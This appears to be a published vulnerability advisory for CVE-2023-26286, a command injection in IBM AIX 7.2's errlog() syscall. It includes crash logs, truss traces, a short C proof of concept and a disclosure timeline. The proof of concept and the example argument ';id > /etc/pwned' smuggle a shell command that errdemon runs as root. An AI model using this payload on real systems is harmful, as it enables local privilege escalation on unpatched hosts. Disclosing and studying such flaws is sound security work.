None,CVE-2023-26286
An OS command injection vulnerability exists in the errlog() syscall functionality of IBM Corporation AIX 7.2. A specially crafted syscall can lead to execute privileged operation. An attacker can execute arbitrary commands to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - http://us.ibm.com
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-117 - Improper Output Neutralization for Logs
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
Research into the attack surface presented by the errlog() syscall has identified 3 potential areas of concern.
It should be noted that these events will likely be onboarded into the system operator’s wider monitoring infrastructure. Being able to inject arbitrary events will allow attackers to actively mislead defenders as to the current operational state of the platform.
Certain combinations of values supplied in the err_rec structure via the error_id, resource_name and detail_data properties to the errlog() syscall can result in out-of-bounds memory access when the events are processed by the errdemon process.
```
$ errpt -a
…
LABEL: CORE_DUMP
IDENTIFIER: A924A5FC
Date/Time: Mon Mar 23 23:54:21 BST 2020
Sequence Number: 22952
Machine Id: 00CA1BFD4C00
Node Id: beehive
Class: S
Type: PERM
WPAR: Global
Resource Name: SYSPROC
Description
SOFTWARE PROGRAM ABNORMALLY TERMINATED
Probable Causes
SOFTWARE PROGRAM
User Causes
USER GENERATED SIGNAL
Recommended Actions
CORRECT THEN RETRY
Failure Causes
SOFTWARE PROGRAM
Recommended Actions
RERUN THE APPLICATION PROGRAM
IF PROBLEM PERSISTS THEN DO THE FOLLOWING
CONTACT APPROPRIATE SERVICE REPRESENTATIVE
Detail Data
SIGNAL NUMBER
11
USER’S PROCESS ID:
7929890
FILE SYSTEM SERIAL NUMBER
4
INODE NUMBER
0 4
CORE FILE NAME
/var/adm/ras/core
PROGRAM NAME
lfailaiocachelv
STACK EXECUTION DISABLED
0
COME FROM ADDRESS REGISTER
PROCESSOR ID
hw_fru_id: 0
hw_cpu_id: 0
ADDITIONAL INFORMATION
strlen 0
_doprnt 7574
vsnprintf 150
lvmt_entr 104
lvmt 124
main 784
__start 6C
Symptom Data
REPORTABLE
1
INTERNAL ERROR
1
SYMPTOM CODE
PIDS/5765E6200 LVLS/520 PCSS/SPI2 FLDS/lfailaioc SIG/11 FLDS/strlen VALU/0 FLDS/main
—————————————————————————
LABEL: LVM_CLV_FAIL_DONE
IDENTIFIER: 30097641
Date/Time: Tue Mar 24 00:06:35 BST 2020 Sequence Number: 22981 Machine Id: 00CA1BFD4C00 Node Id: beehive Class: S Type: INFO WPAR: Global Resource Name: M6UHAE3).JSJXRD$NONE
Description AIO CACHE FAIL RECOVERY DONE
Recommended Actions If asynchronous IO cache is marked as invalid then using chmp command disable the asynchronous mirroring for a volume group. Synchronize all the logical volume copies. Delete a old aio_cache type logical volume. Create a new aio_cache type logical volume. Setup an asynchronous mirroring using new aio_cache type logical volume.
Detail Data AIO CACHE DEVICE MAJOR/MINOR
MIRROR POOL ID
VOLUME GROUP ID ```
Output from truss for the crash is as follows:
7929890: 42664157: kopen(“/var/adm/ras/errlog”, O_RDONLY) = 5
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, “ a e r r l o g r\0\0\0 ▒”.., 32) = 32
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: _lockf(5, 1, 0) Err#9 EBADF
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, “ a e r r l o g r\0\0\0 ▒”.., 32) = 32
7929890: 42664157: lseek(5, 281112, 0) = 281112
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4
7929890: 42664157: lseek(5, 276857, 0) = 276857
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4
7929890: 42664157: kread(5, “\f M ▒ 4\0\0 Y ▒ ^ y >1D”.., 4255) = 4255
7929890: 42664157: lseek(5, 276853, 0) = 276853
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4
7929890: Received signal #11, SIGSEGV [default]
7929890: ** process killed **
The most critical vulnerability can be triggered using the example code to generate an error with an ID of ERRID_CORRUPT_LOG with a resource_name of ;id > /etc/pwned. The resource name is used by errdemon to process events that have been written to /dev/error.
As can be seen in the snippet below, taken from a truss-based recording of the errdemon process’s activity, the supplied resource name value is used to construct the command passed into execve(). This results in it being executed as the root user:
execve(“/usr/bin/sh”, …);
argv: sh -c /usr/lib/physloc ;id > /etc/pwned
The most trivial method of exploitatation to gain command execution takes the following form:
int main(int argc, char **argv) { struct err_rec mal_vec; mal_rec.error_id = ERRID_CORRUPT_LOG; // this can be any valid error ID that has been registered, but the choice can affect how it is processed by errdaemon strcpy(mal_rec.resource_name, argv[1]); errlog((void *) &mal_rec, sizeof(unsigned int) + ERR_NAMESIZE); }
Once the event has been submitted with errlog(), it is then exposed on /dev/error for processing.
For example:
./logpop “;id > /etc/pwned”
This results in /etc/pwned being created with root privileges and populated with the output of the id command when the event is processed by errdemon.
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-13 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.